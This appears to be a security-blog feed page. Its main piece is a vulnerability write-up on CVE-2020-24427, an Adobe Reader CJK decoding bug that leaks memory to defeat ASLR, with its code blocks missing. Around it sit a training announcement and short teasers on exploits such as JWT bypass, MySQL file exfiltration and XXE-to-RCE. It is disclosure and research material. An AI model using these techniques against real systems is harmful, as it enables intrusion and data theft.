As we saw in part two, we took our proof-of-concept crash exploit to a working exploit to gain code execution while avoiding exploit mitigations like ASLR, DEP, and Control Flow Guard. However, we are only executing our exploit in the ChakraCore shell environment. When we port our exploit to Edge in part three, we will need to use several ROP chains (upwards of 11 ROP chains) to get around Arbitrary Code Guard (ACG).

I will see you in part three! Until then.

Peace, love, and positivity :-)

Registration is open for the Windows Internals training

16 March 2022 at 13:13

My schedule has been a mess in recent months, and continues to be so for the next few months. However, I am opening registration today for the Windows Internals training with some date changes from my initial plan.

Here are the dates and times (all based on London time) – 5 days total:

  • July 6: 4pm to 12am (full day)
  • July 7: 4pm to 8pm
  • July 11: 4pm to 12am (full day)
  • July 12, 13, 14, 18, 19: 4pm to 8pm

Training cost is 800 USD, if paid by an individual, or 1500 USD if paid by a company. Participants from Ukraine (please provide some proof) are welcome with a 90% discount (paying 80 USD, individual payments only).

If you’d like to register, please send me an email to [email protected] with “Windows Internals training” in the title, provide your full name, company (if any), preferred contact email, and your time zone. The basic syllabus can be found here. if you’ve sent me an email before when I posted about my upcoming classes, you don’t have to do that again – I will send full details soon.

The sessions will be recorded, so can watch any part you may be missing, or that may be somewhat overwhelming in “real time”.

As usual, if you have any questions, feel free to send me an email, or DM me on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).

Kernel2

zodiacon

CVE-2020-24427: Adobe Reader CJK Codecs Memory Disclosure Vulnerability

15 March 2022 at 08:36

Overview

Over the past year, the team spent sometime looking into Adobe Acrobat. Multiple vulnerabilities were found with varying criticality. A lot of them are worth talking about. There's one specific interesting vulnerability that's worth detailing in public.

Back in 2020, the team found an interesting vulnerability that affected Adobe Reader (2020.009.20074). The bug existed while handling CJK codecs that are used to decode Japanese, Chinese and Korean scripts, namely: Shift JIS, Big5, GBK and UHC. The bug was caused by an unexpected program state during the CJK to UCS-2/UTF-161 decoding process. In this short blog, we will discuss the bug and study one execution path where it was leveraged to disclose memory to leak JavaScript object addresses and bypass ASLR.

  1. BACKGROUND

Before diving into details, let us see a typical use of the functions streamFromString() and stringFromStream() to encode and decode strings:

The function stringFromStream() expects a ReadStream object obtained by a call to streamFromString(). This object is implemented natively in C/C++. It is quite common for clients of native objects to expect certain behavior and overlook some unexpected cases. We tried to see what will happen when stringFromStream() receives an object that that satisfies the ReadStream interface but behaviors unexpectedly like retuning invalid data that can’t be decoded back using –for example– Shift JIS, and this is how the bug was initially discovered.

2. PROOF OF CONCEPT

The following JavaScript is proof of concept demonstrates the bug:

It passes an object with a read() method to stringFromStream(). This function returns invalid Shift JIS byte sequence which begins with the bytes 0xfc and 0x23. After running the code, some random memory data was dumped to the debug console which may include some recognizable strings (the output will differ on different machines):

Surprisingly, this bug does not trigger an access violation or crashes the process – we will see why. Perhaps one useful heuristic to automatically detect such bug is to measure the entropy of the function output. Typically, the output entropy will be high if we pass input with high entropy. An output with low entropy could be an indication of a memory disclosure.


3. ROOT CAUSE ANALYSIS

In order to find the root of the bug, we will trace the call of stringFromStream() which is implemented natively in the EScript.api plugin. This is a decompiled pseudocode of the function:

This function decodes the hex string returned by ReadStream’s read() and checks if the encoding is a CJK encoding – among other single-byte encodings such as Windows-1256 (Arabic). It then creates an ASText object from the encoded string using ASTextFromSizedScriptText(). The exact layout of ASText object is undocumented and we had to reverse engineer it:

The u_str field is a pointer to a Unicode UCS-2/UTF-16 encoded string, and mb_str stores the non-Unicode encoded string. ASTextFromSizedScriptText() initializes mb_str. The string mb_str points to is lazily converted to u_str only if needed.

It worth noting that ASTextFromSizedScriptText() does not validate the encoded data apart from looking for the end of the string by locating the null byte. This works fine because 0x00 maps to the same codepoint in all the supported encodings as they are all supersets2 of ASCII and no multibyte codepoint uses 0x00.

Once the ASText object is created, it is passed to create_JSValue_from_ASText() which converts the ASText object to SpiderMonkey’s string JSValue to pass it to JavaScript:

The function ASTextGetUnicode() is implemented in AcroRd32.dll lazily converts mb_str first to u_str if u_str is NULL and returns the value of u_str:

The function we named convert_mb_to_unicode() is where the conversion happens. It is referenced by many functions to perform the lazy conversion:

The initial call to Host2UCS() computes the size of the buffer required to perform the decoding. Then, it allocates memory, calls Host2UCS() again for the actual decoding and terminates the decoded string. The function change_u_endianness() swaps the byte order of the decoded data. We need to keep this in mind for exploitation.

The initial call to Host2UCS() computes the size of the buffer needed for decoding:

First, Host2UCS() calls MultiByteToWideChar() to get the size of the buffer required for decoding with the flag MB_ERR_INVALID_CHARS set. This flag makes MultiByteToWideChar() fails if it encountered invalid byte sequence. This call will fail with our invalid input data. Next, it calls MultiByteToWideChar() again but without this flag. Which means the function will successfully return to convert_mb_to_unicode().

When the first call to Host2UCS() returns, convert_mb_to_unicode() allocates the buffer and calls Host2UCS() again for the actual decoding. In this call, Host2UCS() will try to decode the data with MultiByteToWideChar() again with the flag MB_ERR_INVALID_CHARS set, and this will fail as we have seen earlier.

This time it will not call MultiByteToWideChar() again because the u_str_size is not zero and the if condition is not met. This makes Adobe Reader falls back to its own decoder:

Initially, it calls PDEncConvAcquire() to allocate a buffer for holding the context data required for decoding. Then it calls PDEncConvSetEncToUCS() which looks up the character map for the codec. However, this call always fails and returns zero. Which means that the call to PDEncConvXLateString() is never reached and the function will return with u_str uninitialized.

The failing function, PDEncConvSetEncToUCS(), initially maps the codepage number to the name of Adobe Reader character map in the global array CJK_to_UC2_charmaps. For example, Shift JIS maps to 90ms-RKSJ-UCS2:

Once the character map name is resolved, it passes the character map name to sub_6079CCB6():

The function sub_6079CCB6() calls PDReadCMapResource() with the character map name as an argument inside an exception handler.

The function PDReadCMapResource() is where the exception is triggered. This function fetches a relatively large data structure stored in the current thread's local storage area:

It checks for a dictionary within this structure and creates one if it does not exist. Then, it checks for a STL-like vector and creates it too if it does not exist. This dictionary stores the decoder data and it entries are looked up by the character map name ASAtom atom string – 90ms-RKSJ-UCS2 in our case. The vector stores the names of the character maps as an ASAtom.

The code that follows is where the exception is triggered:

It looks up the dictionary using the character map name. If the character map is not in the dictionary, it is not expected to be in the vector too, otherwise it will trigger an exception. In our case, the character map 90ms-RKSJ-UCS2

– atom 0x1366 – is not in the dictionary so ASDictionaryFind() returns NULL. However, if we dumped the vector, we will find it there and this is what causes the exception:

Conclusion

In conclusion, we've demonstrated how we analyzed and root-caused the vulnerability in detail by reversing the code.
Encodings are generally hard to implement for developers. The constant need for encoders and encodings makes them a ripe area for vulnerability research as every format has its own encoders.

That’s it for today, hope you enjoyed the analysis. As always, happy hunting!


Disclose Timeline

10 – 8 – 2020 – Vulnerability reported to vendor.
31 – 10 – 2020 – Vendor confirms the vulnerability.
3 – 11 – 2020 – Vendor issues CVE-2020-24427 for the vulnerability.

Reversing embedded device bootloader (U-Boot) - p.1

8 March 2022 at 14:20
This blog post is not intended to be a “101” ARM firmware reverse-engineering tutorial or a guide to attacking a specific IoT device. The goal is to share our experience and, why not, perhaps save you some precious hours and headaches. “Bootrom” In this two posts series, we will share an analysis of some aspects of reversing a low-level binary. Why? Well, we have to admit we struggled a bit to collect the information to build the basic knowledge about this topic and the material we found was often not comprehensive enough, or many aspects were taken for granted.

QilingLab – Release

21 July 2021 at 15:00
Two years ago Ross Marks created the FridaLab challenge as a playground to test and learn how to use the Frida dynamic instrumentation toolkit. At that time, I solved FridaLab and wrote a writeup about it explaining the main APIs and usages of Frida for Android. This helped others to start getting familiar with it and as a reference when developing Frida scripts. After trying Qiling for some time I decided to follow Ross Marks’ steps and to develop a basic playground challenge to make use of the main Qiling features and I obviously called it QilingLab.

Hunting for bugs in Telegram's animated stickers remote attack surface

16 February 2021 at 08:00
Introduction At the end of October ‘19 I was skimming the Telegram’s android app code, learning about the technologies in use and looking for potentially interesting features. Just a few months earlier, Telegram had introduced the animated stickers; after reading the blogpost I wondered how they worked under-the-hood and if they created a new image format for it, then forgot about it. Back to the skimming, I stumbled upon the rlottie folder and started googling.

Re-discovering a JWT Authentication Bypass in ServiceStack

2 November 2020 at 08:37
TL;DR ServiceStack before version 5.9.2 failed to properly verify JWT signatures, allowing to forge arbitrary tokens and bypass authentication/authorization mechanisms. The vulnerability was discovered and patched by the ServiceStack team without highlighting the actual impact, so we chose to publish this blog post along with an advisory. Routine checks –> Auth bypass During a Web Application Penetration Test for one of our customers, I noticed that after the login process through a 3rd-party Oauth service the web application used JWT tokens to track sessions and privileges.

Sometimes they come back: exfiltration through MySQL and CVE-2020-11579

28 July 2020 at 14:18
Let’s jump straight to the strange behavior: up until PHP 7.2.16 it was possible by default to exfiltrate local files via the MySQL LOCAL INFILE feature through the connection to a malicious MySQL server. Considering that the previous PHP versions are still the majority in use, these exploits will remain useful for quite some time. Like many other vulnerabilities, after reading about this quite-unknown attack technique (1, 2), I could not wait to find a vulnerable software where to practice such unusual dynamic.

1-click RCE on Keybase

27 April 2020 at 18:00
TL;DR Keybase clients allowed to send links in chats with arbitrary schemes and arbitrary display text. On Windows it was possible to send an apparently harmless link which, when clicked, could execute arbitrary commands on the victim’s system. Introduction Keybase is a chat, file sharing, git, * platform, similar to Slack, but with a security in-depth approach. *Everything* on Keybase is encrypted, allowing you to relax while syncing your private files on the cloud.

NotSoSmartConfig: broadcasting WiFi credentials Over-The-Air

20 April 2020 at 16:00
During one of our latest IoT Penetration Tests we tested a device based on the ESP32 SoC by EspressIF. While assessing the activation procedure we faced for the first time a beautiful yet dangerous protocol: SmartConfig. The idea behind the SmartConfig protocol is to allow an unconfigured IoT device to connect to a WiFi network without requiring a direct connection between the configurator and the device itself – I know, it’s scary.

Don’t open that XML: XXE to RCE in XML plugins for VS Code, Eclipse, Theia, …

24 October 2019 at 17:22
TL;DR LSP4XML, the library used to parse XML files in VSCode-XML, Eclipse’s wildwebdeveloper, theia-xml and more, was affected by an XXE (CVE-2019-18213) which lead to RCE (CVE-2019-18212) exploitable by just opening a malicious XML file. Introduction 2019 seems to be XXE’s year: during the latest Penetration Tests we successfully exploited a fair amount of XXEs, an example being https://www.shielder.com/blog/exploit-apache-solr-through-opencms/. It all started during a web application penetration test, while I was trying to exploit a blind XXE with zi0black.
❌
❌